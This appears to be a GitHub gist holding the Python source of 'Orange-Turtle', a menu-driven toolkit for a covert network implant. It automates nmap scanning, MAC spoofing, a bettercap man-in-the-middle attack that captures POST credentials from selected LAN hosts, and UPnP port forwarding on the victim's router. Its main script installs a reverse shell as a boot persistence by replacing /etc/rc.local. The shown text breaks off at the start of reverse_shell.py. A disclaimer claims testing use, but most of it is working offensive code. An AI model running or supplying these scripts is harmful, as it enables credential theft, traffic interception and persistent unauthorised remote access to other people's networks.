Skip to content

Instantly share code, notes, and snippets.

@schafon

schafon/Orange-Turtle.py

Last active January 17, 2019 13:52
Show Gist options
  • Save schafon/d01d73d259b23da4c64f0227c55169af to your computer and use it in GitHub Desktop.
Save schafon/d01d73d259b23da4c64f0227c55169af to your computer and use it in GitHub Desktop.
Download ZIP
Script for Orange-Turtle - basic commands made easy for beginners
Raw
check_install.py
import os
def check_all_components():
os.system("sudo apt-get install cowsay -y")
os.system("sudo apt-get install macchanger -y")
#os.system("sudo apt-get install bettercap -y")
os.system("sudo apt-get install miniupnpc -y")
Raw
cow_say_function.py
import os
import time
import subprocess
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def cow_say(say):
interval = 1.5
if os.path.isfile('/root/orange_turtle_data/cowsay_duration.txt') is True:
cow_say_duration_file = open('/root/orange_turtle_data/cowsay_duration.txt', 'r')
interval = cow_say_duration_file.read()
os.system("/usr/games/cowsay '" + str(say) + "'")
time.sleep(interval)
def draw_line():
process = subprocess.check_output(["tput", "cols"])
string = ""
for i in range(int(process)):
string += "-"
print(bcolors.OKGREEN + string + bcolors.ENDC)
Raw
mac_changer.py
import os
import cow_say_function
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def mac_changer_start(interface_for_wlan, interface_for_eth):
while True:
os.system("clear")
os.system("figlet 'MAC Changer'")
print("With this tool you can change your MAC address")
print("Mac address is an a unique identifier for your network card")
print("Each network card(Wireless/Ethernet) is manufactured with this special address ")
print("This address is permanent but with this tool you can fake it")
cow_say_function.draw_line()
print("Please select an option:")
print("1. Show my current MAC address")
print("2. Change my MAC address to random MAC address")
print("3. I know the MAC address I want to change to(You must follow this format: XX:XX:XX:XX:XX:XX )")
print("4. Reset to original, permanent hardware MAC")
print("5. Back to main menu")
user_option = input('Please select one of the above \n')
if user_option is '1':
while True:
os.system("clear")
user_option = input(
"Would you like to view the (w)ireless card address or the (e)thernet card?(w/e) \n")
if user_option is 'w':
interface = interface_for_wlan
break
elif user_option is 'e':
interface = interface_for_eth
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
os.system("macchanger -s -i " + interface)
user_input = input("Press any key to continue...")
break
elif user_option is '2':
while True:
os.system("clear")
user_option = input(
"Would you like to change the (w)ireless card address or the (e)thernet card?(w/e) \n")
if user_option is 'w':
interface = interface_for_wlan
break
elif user_option is 'e':
interface = interface_for_eth
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
os.system("macchanger -r -i " + interface)
print("Done!")
user_input = input("Press any key to continue...")
break
elif user_option is '3':
while True:
os.system("clear")
user_option = input(
"Would you like to change the (w)ireless card address or the (e)thernet card?(w/e) \n")
if user_option is 'w':
interface = interface_for_wlan
break
elif user_option is 'e':
interface = interface_for_eth
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
user_mac_input = str(input("Enter your desired MAC address in this format XX:XX:XX:XX:XX:XX \n"))
os.system("macchanger -m " + user_mac_input + " -i " + interface)
user_input = input("Press any key to continue...")
break
elif user_option is '4':
while True:
os.system("clear")
user_option = input(
"Would you like to change the (w)ireless card or the (e)thernet card?(w/e) \n")
if user_option is 'w':
interface = interface_for_wlan
break
elif user_option is 'e':
interface = interface_for_eth
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
os.system("macchanger -p -i " + interface)
user_input = input("Press any key to continue...")
break
elif user_option is '5':
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
mac_changer_start(interface_for_wlan, interface_for_eth)
Raw
mitm_attack.py
import os
import subprocess
import time
import socket
import struct
import cow_say_function
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_default_gateway_linux():
"""Read the default gateway directly from /proc."""
with open("/proc/net/route") as fh:
for line in fh:
fields = line.strip().split()
if fields[1] != '00000000' or not int(fields[3], 16) & 2:
continue
return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
def validate_ip(ip):
try:
socket.inet_aton(ip)
#valid
return True
except socket.error:
# Not legal
return False
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_subnet(ip):
#convert the ip to string var
ip = str(ip)
#check if the ip is valid:
ip_valid_flag = validate_ip(ip)
if ip_valid_flag:
index = ip.rfind('.')
ip = ip[:index+1]
ip = ip + '*'
return ip
else:
print("Oops.. it seems like your local ip address is not valid..")
print("I can restart the network manager for you, but you will loss your connection for few seconds..")
while True:
os.system("clear")
user_option = input("Type (r)estart or (c)ancel to go to main page")
if user_option is 'r' or user_option is 'R':
os.system("service network-manager restart")
os._exit(0)
elif user_option is 'c' or user_option is 'C':
#main.user_input()
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
def mitm_start():
while True:
os.system("clear")
os.system("figlet 'MITM(Bettercap)'")
print("With this attack you become the man in the middle, it means that the clients you")
print("want to attack will send all of the network traffic through me and then will be sent")
print("to the gateway - with this tool you can see the websites that the victim is browsing")
print("and get usernames and passwords(not always working due to HSTS security).")
print("For more information about this tool please visit https://www.bettercap.org/")
cow_say_function.draw_line()
user_option = input('To start the process type start, to go back type back \n')
if user_option == "back":
print("OK, going to main menu")
return
elif user_option == "start":
break
else:
print("This is not an option! Try again")
pass
print("Getting your local IP...")
local_ip = get_ip_address()
print("your local IP is:" + local_ip)
print("Getting NetMask for Nmap scan...")
local_subnet = get_subnet(local_ip)
print("Scaning range: " + local_subnet)
print("Checking if you got Nmap installed...")
try:
nmap_scan_attempt = subprocess.Popen(["nmap"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except FileNotFoundError:
while True:
user_option = input("Oops, it seems like Nmap is not installed.. "
"Would you like me to install it for you? y/n")
if user_option is 'y':
print("Trying to instal Nmap...")
os.system("sudo apt-get install nmap -y")
break
elif user_option is 'n':
print("Taking you to main menu..")
#main.user_input()
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
print("Starting the Nmap scan...This might take a while depends on the network size")
nmap_scan = subprocess.Popen(["nmap", '-T5', local_subnet], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
ip_list = nmap_scan.stdout.readlines()
clean_ip_list = []
counter = 0
import re
while True:
os.system("clear")
for i in range(len(ip_list)):
ip_list[i] = str(ip_list[i])
if "scan report for" in ip_list[i]:
ip_list[i] = ip_list[i].replace("b'Nmap scan report for", ". Found - ")
ip_list[i] = ip_list[i][:-3]
clean_ip_list.append(ip_list[i])
print(str(counter + 1) + clean_ip_list[counter])
print(bcolors.OKBLUE + "------------------------------" + bcolors.ENDC)
counter = counter + 1
if counter is 0:
print("Couldent find any clients...")
time.sleep(2)
print("Taking you back to main page...")
time.sleep(2)
mitm_start()
user_option = input(bcolors.WARNING +
"All of the hosts in this list is up(online), please select the host/s you "
"want to target(type the numbers i.e - '1,2,3')"
"(If you want all of them type 'all'):" + bcolors.ENDC + '\n')
user_ip_targets = []
if user_option == "all":
user_ip_targets
for index in range(len(clean_ip_list)):
user_ip_targets.append(re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
clean_ip_list[index]).group())
break
elif user_option is not '':
user_option_str = str(user_option)
user_targets = user_option_str.split(',')
for index in range(len(user_targets)):
user_ip_targets.append(re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
clean_ip_list[int(user_targets[index])-1]).group())
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
while True:
os.system("clear")
user_option = input(bcolors.WARNING + "You are targeting this ip/'s:" + str(user_ip_targets) +
" type ok or back" + bcolors.ENDC + '\n')
if user_option == "back":
return
elif user_option == "ok":
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
try:
attempt = subprocess.Popen(["bettercap"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except FileNotFoundError:
while True:
user_option = input("Bettercap is not installed on your turtle, would you like me to try to"
" install it for you? y/n")
if user_option is 'y':
print("Trying to instal Bettercap...")
os.system("sudo apt-get install build-essential ruby-dev libpcap-dev -y")
os.system("gem install bettercap")
print("updating bettercap...")
os.system("gem update bettercap")
break
elif user_option is 'n':
cow_say_function.cow_say("This is not a option!\nTry again")
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
while True:
user_option = input("We got everything we need.. are you ready to start?(ok or cancel)")
if user_option == "ok":
print("starting..")
break
elif user_option == "cancel":
print("Taking you to main menu...")
#user_input()
return
else:
print("This is not an option! Try again")
user_ip_targets_string = ""
for i in user_ip_targets:
user_ip_targets_string += i + ','
user_ip_targets_string = user_ip_targets_string[:-1]
print(user_ip_targets_string)
os.system("clear")
print(bcolors.OKGREEN + bcolors.BOLD + "You can Quit any time by clicking Ctrl+C" + bcolors.ENDC)
os.system("bettercap -T " + user_ip_targets_string + " --proxy -P post")
Raw
network_sniffer.py
import os
import time
import subprocess
from nmap_scan import get_ip_address
import calendar
import open_port_check
import cow_say_function
# This file controls the setting of the network sniffer, the user enters the remote IP and port of his computer
default_port = 1234
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def check_gupnp_install():
print("Checking if you got upnpc installed...")
try:
attempt = subprocess.Popen(["upnpc"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print("Installed!")
print(attempt.stderr)
time.sleep(1.5)
except FileNotFoundError:
print("Installing upnpc")
os.system("apt-get install miniupnpc -y")
def open_port_on_router():
while True:
os.system("clear")
os.system("figlet 'Port-Forward'")
print("You can open port on the router of the network that the Turtle is connected to right now")
print("But! Please notice - this is a risk, other hackers outside the network can also see the port.")
print("In addition open ports on a network is very " + bcolors.WARNING + "*suspicious*" + bcolors.ENDC +
" to the network owner!")
print("If you decide to go for it anyway, you need to know what you doing")
print("You can get the remote IP in the main Turtle menu.")
print("This action is not guaranteed to work - it depends on the network and router settings")
cow_say_function.draw_line()
open_port = open_port_check.check_open_port_details()
if open_port is not False:
print("1. Open port on target network - " + bcolors.OKGREEN +
str(open_port_check.check_open_port_details()) + bcolors.ENDC)
open_port = True
print("2. Close port on target network")
print("3. Back to Sniffer menu")
else:
print("1. Open port on target network")
print("2. Back to Sniffer menu")
user_option = input('Please choose one of the above \n')
if user_option is '1':
print(bcolors.OKBLUE + "You can quit any time by typing 'Q'" + bcolors.ENDC)
public_port_to_open = input("Enter " + bcolors.BOLD + "public" + bcolors.ENDC + " port to open:\n")
if public_port_to_open is 'Q':
return
local_port_to_open = input("Enter " + bcolors.BOLD + "local" + bcolors.ENDC + " port to open:\n")
if local_port_to_open is 'Q':
return
local_ip_to_forward_to = input("Enter " + bcolors.BOLD + "local" + bcolors.ENDC + " IP to forward "
"to (type '1' for turtle current local IP):\n")
if local_ip_to_forward_to is '1':
local_ip_to_forward_to = get_ip_address()
elif local_ip_to_forward_to is 'Q':
return
lease_time = input("For how long do you want this port to stay open?(enter number in seconds):\n")
if lease_time is 'Q':
return
print("Seting...")
if os.path.isdir('/root/orange_turtle_data') is False:
os.system("mkdir /root/orange_turtle_data")
open_port_data_file = open('/root/orange_turtle_data/open_port_data_file.txt', 'w')
open_port_data_file.write("local_port_to_open=" + str(local_port_to_open) + '\n') # [0]
open_port_data_file.write("public_port_to_open=" + str(public_port_to_open) + '\n') # [1]
open_port_data_file.write("local_ip_to_forward_to=" + str(local_ip_to_forward_to) + '\n') # [2]
open_port_data_file.write("lease_time=" + str(lease_time) + '\n') # [3]
#open_port_data_file.write("service_name=" + str(service_name) + '\n') # [4]
open_port_data_file.write("time_stamp=" + str(calendar.timegm(time.gmtime())) + '\n') # [4]
open_port_data_file.close()
os.system("upnpc -a " + str(local_ip_to_forward_to) + " " + str(local_port_to_open) + " " +
str(public_port_to_open) + " tcp " + str(lease_time))
print("Done")
print("Taking you to Sniffer menu...")
time.sleep(4)
return
elif user_option is '2' and open_port:
if os.path.isfile('/root/orange_turtle_data/open_port_data_file.txt') is True:
print("Open port found!")
while True:
if os.path.isfile('/root/orange_turtle_data/open_port_data_file.txt') is True:
open_port_data_file = open('/root/orange_turtle_data/open_port_data_file.txt', 'r')
open_port_data = str(open_port_data_file.read())
open_port_data_lines = open_port_data.splitlines()
time_stamp = open_port_data_lines[4].replace('time_stamp=', '')
lease_time = open_port_data_lines[3].replace('lease_time=', '')
time_left = int(lease_time) - (calendar.timegm(time.gmtime()) - int(time_stamp))
print("Time left till port automatically closed: " + str(time_left) + " seconds")
user_input = input("Would you like to close it anyway?(y/n) \n")
if user_input is 'y':
local_port_to_open = open_port_data_lines[0].replace("local_port_to_open=",'')
public_port_to_open = open_port_data_lines[1].replace("public_port_to_open=", '')
local_ip_to_forward_to = open_port_data_lines[2].replace('local_ip_to_forward_to=', '')
lease_time = 1 # set it to 1 second to kill it in 1 second
# service_name = open_port_data_lines[4].replace('service_name=', '')
# kill it! -d external_port protocol
os.system("upnpc -d " + str(public_port_to_open) + " tcp" )
print("Port forwarding " + str(public_port_to_open) + "->" + str(local_port_to_open) +
" Closed!")
print("Deleting data file..")
os.system("rm /root/orange_turtle_data/open_port_data_file.txt")
print("Done")
break
elif user_input is 'n':
print("Taking you to Sniffer menu...")
time.sleep(6)
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
print("Taking you to Sniffer menu...")
time.sleep(6)
pass
elif (user_option is '3' and open_port) or user_option is '2' and open_port is False:
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
def remote_connection(action):
if action:
print("Seting remote connection to " + bcolors.OKGREEN + "TRUE" + bcolors.ENDC + " - " +
bcolors.WARNING + "This will only take effect on next boot!" + bcolors.ENDC)
os.system("echo 1 > /root/orange_turtle_data/remote_connection_enabled.txt")
else:
print("Seting remote connection to " + bcolors.FAIL + "FALSE" + bcolors.ENDC + " - " +
bcolors.WARNING + "This will only take effect on next boot!" + bcolors.ENDC)
os.system("echo 0 > /root/orange_turtle_data/remote_connection_enabled.txt")
def set_ip_and_port():
while True:
os.system("clear")
os.system("figlet 'IP & Port'")
print("You can set the remote IP and port of your remote computer(you need to install Orange-Server).")
print("If your remote computer is OUTSIDE of your local network you need to set the PUBLIC IP of the \n"
"remote computer(you can get the remote computer IP from the Orange-Server software")
print("If you want to do this attack inside your local network\n"
"(Orange-Server and Orange-Turtle on the same network) just enter the local IP of the remote computer.")
print(bcolors.WARNING + "Please notice that the IP and port you will enter here will not be validate,"
" so please make sure you enter the right IP and port." + bcolors.ENDC)
cow_say_function.draw_line()
print("1. Set the IP and port of remote computer")
print("2. Back to Sniffer menu")
user_option = input('Please choose one of the above \n')
if user_option is '1':
remote_ip = input("Your remote IP:\n")
remote_port = input("Your remote port:(leave blank for default)\n")
if len(remote_port) < 2:
remote_port = str(default_port)
print("Your remote IP is: ", str(remote_ip), "\nYour remote port: ", str(remote_port))
user_input = input("Are your sure?(y/n)")
if user_input is 'y':
if os.path.isdir('/root/orange_turtle_data') is False:
print("Creating directory for remote pc data...")
os.system("mkdir /root/orange_turtle_data/")
print("Writing data to data file...")
f = open('/root/orange_turtle_data/remote_computer_info.txt', 'w')
f.write('ip=' + str(remote_ip) + '\n')
f.write('port=' + str(remote_port) + '\n')
f.close()
print("Great! your remote IP and port are set!" +
bcolors.WARNING + " BUT you will need to activate the attack from the main menu" + bcolors.ENDC)
user_input = input("Press any key to continue\n")
return
elif user_input is 'n':
pass
elif user_option is '2':
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
def network_sniffer_menu():
while True:
os.system("clear")
os.system("figlet 'Sniffer'")
print("With this function you can set your remote IP and port that the Orange-Turtle will connect to")
print("You will need to download the software(Orange-Server) for the remote computer, contact Shachaf for detalis")
cow_say_function.draw_line()
print("1. Set the IP and port of your remote computer")
print("2. Enable remote connection to your remote computer on next boot")
print("3. Turn OFF the remote connection next boot")
print("4. Open port on this local network(YOU MAY GET CAUGHT)")
print("5. Back to main menu")
user_option = input('Please choose one of the above \n')
if user_option is '1':
set_ip_and_port()
elif user_option is '2':
print("Setting remote connection to remote computer to enable")
remote_connection(True)
print("Done!")
time.sleep(2)
elif user_option is '3':
print(bcolors.WARNING + "If you turn off remote connection while connected by from remote site you\n"
"will lose your connection Permanently on next boot!!" + bcolors.ENDC)
user_input = input("Are you sure you want to continue?(y/n)")
if user_input is 'y':
print("Setting remote connection to remote computer to disable")
remote_connection(False)
print("Done!")
time.sleep(2)
else:
print(bcolors.OKGREEN + "Canceled!" + bcolors.ENDC)
time.sleep(2)
elif user_option is '4':
open_port_on_router()
elif user_option is '5':
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
Raw
nmap_scan.py
import os
import subprocess
import time
import socket
import cow_say_function
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def check_nmap_install():
print("Checking if you got Nmap installed...")
try:
nmap_scan_attempt = subprocess.Popen(["nmap"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except FileNotFoundError:
while True:
user_option = input("Oops, it seems like Nmap is not installed.. "
"Would you like me to install it for you? y/n")
if user_option is 'y':
print("Trying to instal Nmap...")
os.system("sudo apt-get install nmap -y")
break
elif user_option is 'n':
print("Taking you to main menu..")
return
else:
print("This is not an option! Try again")
pass
def check_public_local():
while True:
user_input = input("Would you like to scan your (" + bcolors.OKGREEN + "l" + bcolors.ENDC + ")ocal network (the"
" one you connected to right now) or another (" + bcolors.OKBLUE + "p" + bcolors.ENDC +
")ublic IP?(l/p)")
if user_input is 'l':
local_ip = get_ip_address()
local_subnet = get_subnet(local_ip)
print("Your local IP address is: ", local_ip)
print("Nmap will attempt to scan 256 IP addresses in the subnet: ", local_subnet)
return local_subnet
elif user_input is 'p':
user_input_ip = str(input("OK, Please enter the IP address that you want to scan:\n"))
if validate_ip(user_input_ip) is True:
print("Great! the IP address you entered is valid.")
return user_input_ip
else:
while True:
user_input2 = ("Oops.. it seems that the IP address you entered is not valid.."
"Would you like to scan it anyway?(y/n)")
if user_input2 is 'y':
return user_input_ip
elif user_input2 is 'n':
print("Taking you to back to Nmap menu..")
time.sleep(2)
return 'e'
else:
cow_say_function.cow_say("This is not a option!\nTry again")
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
def validate_ip(ip):
try:
socket.inet_aton(ip)
#valid
return True
except socket.error:
# Not legal
return False
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_subnet(ip):
#convert the ip to string var
ip = str(ip)
#check if the ip is valid:
ip_valid_flag = validate_ip(ip)
if ip_valid_flag:
index = ip.rfind('.')
ip = ip[:index+1]
ip = ip + '*'
return ip
else:
print("Oops.. it seems like your local ip address is not valid..")
print("I can restart the network manager for you, but you will loss your connection for few seconds..")
while True:
user_option = input("Type (r)estart or (c)ancel to go to main page")
if user_option is 'r' or user_option is 'R':
os.system("service network-manager restart")
os._exit(0)
elif user_option is 'c' or user_option is 'C':
return
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
def nmap_scan_start():
while True:
os.system("clear")
os.system("figlet 'Nmap'")
print("Nmap 7.50 - Network scanner and mapper.")
print("With this tool you can scan your local network or any other public IP address.")
print("This tool search for open ports and services, you can also get the operation systems.")
print("Like ive already mentioned, you can scan your local network or public IPs")
print(
"Network scan is the most basic step in hacking, you can get the services of the device \nyou scanning and then check if"
"there is known vulnerability for this service.")
print("This is main sites that you can check your services at:")
print("exploit-db.com - Offensive Security’s Exploit Database Archive")
print("offensive-security.com/community-projects/the-exploit-database/ - The Exploit Database")
print("rapid7.com/db - Vulnerability & Exploit Database")
cow_say_function.draw_line()
print("1. Start a Quick scan ")
print("2. Start Ping scan")
print("3. StartIntense scan")
print("4. Start Intense scan, no ping")
print("5. Start Intense scan, all TCP ports")
print("6. StartRegular scan")
print("7. Start a Slow comprehensive scan")
print("8. Back to main menu")
user_input = input(bcolors.OKGREEN + "Please select scan type\n" + bcolors.ENDC)
check_nmap_install()
if user_input is '1':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system("nmap -T4 -F " + public_or_local)
elif user_input is '2':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system("nmap -sn " + public_or_local)
elif user_input is '3':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system("nmap -T4 -A -v " + public_or_local)
elif user_input is '4':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system("nmap -T4 -A -v -Pn " + public_or_local)
elif user_input is '5':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system("nmap -p 1-65535 -T4 -A -v " + public_or_local)
elif user_input is '6':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system("nmap " + public_or_local)
elif user_input is '7':
public_or_local = check_public_local()
if public_or_local is 'e':
break
else:
os.system('nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53'
' --script "default or (discovery and safe)" ' + public_or_local)
elif user_input is '8':
break
else:
cow_say_function.cow_say("This is not a option!\nTry again")
pass
Raw
open_port_check.py
import os
import time
import calendar
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def check_open_port_file_exist():
if os.path.isfile('/root/orange_turtle_data/open_port_data_file.txt') is True:
open_port_data_file = open('/root/orange_turtle_data/open_port_data_file.txt', 'r')
open_port_data = str(open_port_data_file.read())
open_port_data_lines = open_port_data.splitlines()
time_stamp = open_port_data_lines[4].replace('time_stamp=', '')
lease_time = open_port_data_lines[3].replace('lease_time=', '')
time_left = int(lease_time) - (calendar.timegm(time.gmtime()) - int(time_stamp))
if time_left < 1:
os.system("rm /root/orange_turtle_data/open_port_data_file.txt")
return (bcolors.OKBLUE + "Open port recently closed" + bcolors.ENDC)
return (bcolors.WARNING + "Open port found!" + bcolors.ENDC)
else:
return 'n'
def check_open_port_details():
if os.path.isfile('/root/orange_turtle_data/open_port_data_file.txt') is True:
# print(bcolors.WARNING + "Open port found!" + bcolors.ENDC)
open_port_data_file = open('/root/orange_turtle_data/open_port_data_file.txt', 'r')
open_port_data = str(open_port_data_file.read())
open_port_data_lines = open_port_data.splitlines()
time_stamp = open_port_data_lines[4].replace('time_stamp=', '')
lease_time = open_port_data_lines[3].replace('lease_time=', '')
time_left = int(lease_time) - (calendar.timegm(time.gmtime()) - int(time_stamp))
if time_left < 1:
os.system("rm /root/orange_turtle_data/open_port_data_file.txt")
return False
return (bcolors.OKBLUE + "Time left till port automatically closed: " + str(time_left) + " seconds"
+ bcolors.ENDC)
else:
return False
Raw
Orange-Turtle.py
#!/usr/bin/python3
# Version 1.1
import cow_say_function
import check_install
import network_sniffer
import open_port_check
import settings
from mac_changer import *
from mitm_attack import *
from nmap_scan import *
from wifi_deauther import *
interface_for_wlan = "wlan0"
interface_for_eth = "eth0"
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def set_env_variables():
print("setting env var...")
os.system("export TERM=vt100")
os.system("PATH=$PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/game")
os.system("export SHELL=bash")
print("Done!")
def check_shell_on_boot():
print("Check shell on boot...")
print("Copying and autorizing reverse_shell.py ")
os.system("cp /root/orange_turtle/reverse_shell.py /etc/init.d/reverse_shell.py")
os.system("chmod +x /etc/init.d/reverse_shell.py")
print("Copying and autorizing run_rev_shell.sh ")
os.system("cp /root/orange_turtle/run_rev_shell.sh /etc/init.d/run_rev_shell.sh")
os.system("chmod +x /etc/init.d/run_rev_shell.sh")
rc_file = open('/etc/rc.local', 'r')
content = rc_file.read()
content_splited = content.split('\n')
if "run_rev_shell.sh" in content:
print("found run_rev_shell.sh in rc.local")
return
else:
print("Deleting rc.local and replacing with new rc.local file")
os.system("rm /etc/rc.local")
os.system("cp /root/orange_turtle/rc.local /etc/rc.local")
os.system("chmod +x /etc/rc.local")
print(bcolors.OKBLUE + "Injected reverse_shell file to boot -\n Network-Sniffer will be available on next reboot" + bcolors.ENDC)
time.sleep(5)
def network_sniffer_start():
global remote_ip_address
global remote_port_address
def user_input():
while True:
os.system("clear")
os.system("figlet 'Orange-Turtle'")
print("Autor: Schafon 19/11/2017")
cow_say_function.draw_line()
if os.path.isdir('/root/orange_turtle_data') is False:
os.system("mkdir /root/orange_turtle_data")
if os.path.isfile('/root/orange_turtle_data/remote_connection_enabled.txt') is True:
remote_connection_enable_file = open('/root/orange_turtle_data/remote_connection_enabled.txt', 'r')
remote_connection_enable_data = str(remote_connection_enable_file.read())
if '1' in remote_connection_enable_data:
print("Remote connection to remote computer is " + bcolors.OKGREEN + bcolors.BOLD + "ENABLE" + bcolors.ENDC)
if os.path.isfile('/root/orange_turtle_data/remote_computer_info.txt') is True:
remote_computer_info_file = open('/root/orange_turtle_data/remote_computer_info.txt', 'r')
remote_computer_info = str(remote_computer_info_file.read())
remote_computer_info_lines = remote_computer_info.splitlines()
if len(remote_computer_info_lines) is 2:
# the file is ok
remote_ip = remote_computer_info_lines[0].replace('ip=', '')
remote_port = remote_computer_info_lines[1].replace('port=', '')
print(bcolors.OKBLUE + "Remote IP: " + str(remote_ip) + bcolors.ENDC)
print(bcolors.OKBLUE + "Remote port: " + str(remote_port) + bcolors.ENDC)
else:
print(bcolors.WARNING + "Error with remote_computer_info - less then 2 lines- Did you set "
"the IP and port correctly?" + bcolors.ENDC)
else:
print("Remote connection to remote computer is " + bcolors.FAIL + bcolors.BOLD + "DISABLED" +
bcolors.ENDC)
open_port_status = str(open_port_check.check_open_port_file_exist())
if open_port_status is not 'n':
print("1. Network Sniffer & port forward - " + str(open_port_check.check_open_port_file_exist()))
else:
print("1. Network Sniffer & port forward ")
print("2. Start Man-In-The-Middle attack (all traffic goes through me!)")
print("3. Change my MAC address")
print("4. Scan WiFi in my area") #- " + bcolors.OKGREEN + "Under development" + bcolors.ENDC)
print("5. WiFi deauther(Only active with Wi-Fi adapter) - " + bcolors.OKGREEN + "Under development" + bcolors.ENDC)
print("6. DNS Spoof - " + bcolors.OKGREEN + "Under development" + bcolors.ENDC)
print("7. View my public IP")
print("8. Nmap scan (see who is around me on this network or look for remote IP)")
print("9. Connect to Wi-Fi network")
print("10. Settings")
print("11. Update Orange-Turtle")
print("12. Exit")
user_option = input('Please choose one of the above \n')
if user_option is '1':
network_sniffer.network_sniffer_menu()
elif user_option is '2':
mitm_start()
elif user_option is '3':
mac_changer_start(interface_for_wlan, interface_for_eth)
elif user_option is '4':
os.system("clear")
os.system("nmtui-connect")
elif user_option is '5':
wifi_deauther_start(interface_for_wlan)
elif user_option is '6':
dns_spoof_start()
elif user_option is '7':
os.system("clear")
print("The Orange-Turtle Public IP address is:")
os.system("curl ifconfig.me/ip")
print("The Orange-Turtle Public IP address is:")
print(str(get_ip_address()))
user_option = input("Press any key to continue...")
elif user_option is '8':
nmap_scan_start()
elif user_option is '9':
os.system("nmtui-connect")
elif "10" in user_option:
settings.settings_menu()
elif "11" in user_option:
os.system("python3 /etc/init.d/o_t_update.py")
print("Done!")
time.sleep(2)
elif "12" in user_option or "exit" in user_option:
cow_say_function.cow_say("Good bye!")
os.system("clear")
os.system("/bin/bash")
else:
cow_say_function.cow_say("This is not a option!\nTry again")
def show_disclaimer():
print("This software was developed for security testing purposes only")
print("any illegal use of this software or hardware is forbidden by law.")
print("The author of this software is not responsible for any")
print("damage or and illegal activity caused by this software or hardware.")
print("This software is made of many useful open source tools")
print("that are public available under open licence.")
print("The author of this software is not the developer of the ")
print("tools used inside the software nor the hardware.")
print("The developer of this tool is not responsible for any ")
print("damage caused to anyone by this tool in any way.")
print("You CAN edit/change the source code, add your own code ")
print("and make any changes you want to the hardware.")
print("By typing 'Yes' you agree to all stated above and commit ")
print("to not make any illegal use using this device and software.")
while True:
user_input = input("If you agree to this terms of use type yes and click Enter\n")
if user_input == "yes" or user_input == "Yes":
os.system("clear")
print("Thank you")
time.sleep(2)
break
else:
print("Type 'yes' to agree\n")
try:
dis_file = open("/root/orange_turtle_data/disclaimer.txt","r")
except IOError:
show_disclaimer()
dis_file = open("/root/orange_turtle_data/disclaimer.txt", "w")
dis_file.close()
set_env_variables()
print("Updating core components...")
check_install.check_all_components()
print("Checking shell settings...")
check_shell_on_boot()
user_input()
Raw
rc.local
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
sudo /etc/init.d/ssh start
sudo python3 /etc/init.d/o_t_update.py
sudo /etc/init.d/run_rev_shell.sh
exit 0
Raw
reverse_shell.py
#!/usr/bin/python3
import os
import time
import socket
import subprocess
# This file check if the user enabled the remote computer connection and if so start he reverse shell to the ip and
